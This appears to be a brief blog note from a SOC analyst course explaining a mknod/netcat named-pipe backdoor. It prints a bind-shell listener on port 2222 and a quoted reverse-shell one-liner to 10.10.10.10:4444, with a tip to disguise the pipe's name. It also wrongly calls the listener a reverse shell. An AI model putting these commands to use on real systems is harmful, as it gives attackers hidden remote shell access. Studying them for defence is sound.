Named Pipe
During the BHIS SOC Analyst Core course I took recently, the Linux Lab had an interesting command where you create a FIFO (First in, First out) "backpipe" with mknod (create filesystem node) and netcat, effectively creating a shell backdoor on a Linux system.
mknod backpipe p
/bin/bash 0<backpipe | nc -l 2222 1>backpipe
Basically, mknod <string> p creates a named pipe (specified by the p) called "backpipe" (though it could functionally be named anything that doesn't conflict with other things; for example in the tcpdump Bonus Lab, one could name it timesync.svc or something similar to make it less obvious). This Named Pipe allows us to pipe an output from any location in the shell to any location in the shell.
Additionally, > and < can be used to redirect input in a script; for example, if we ran ./FiscalReport.sh < 2024Q1.csv, the FiscalReport shell script would input the values from 2024Q1.csv.
Let's break backpipe command down and see what's going on.
mknod backpipe p- Creates a named pipe called "backpipe"
/bin/bash 0<backpipe/bin/bashreads its standard input (stdin, file descriptor0) from the "backpipe"
2.backpipe's output becomes/bin/bash's input
|- The output from the prior command is pipe into the following command
nc -l 2222 1>backpipe- Netcat listens to port 2222 and the standard output (
stdout, file descriptor1) is sent into the named pipe "backpipe"
- Netcat listens to port 2222 and the standard output (
To summarize, this forms a loop; Netcat listens for data on port 2222, sends it to the backpipe. The backpipe sends the output to Bash's input, and Bash's output gets piped to Netcat.
This is a Reverse Shell, allowing an attacker to execute shell commands on a remote system.
Reverse shell cheatsheet has a similar command, which I've pasted below:
mknod backpipe p && nc 10.10.10.10 4444 0<backpipe | /bin/bash 1>backpipe
This is all pretty wild, but what else can we do with a backpipe?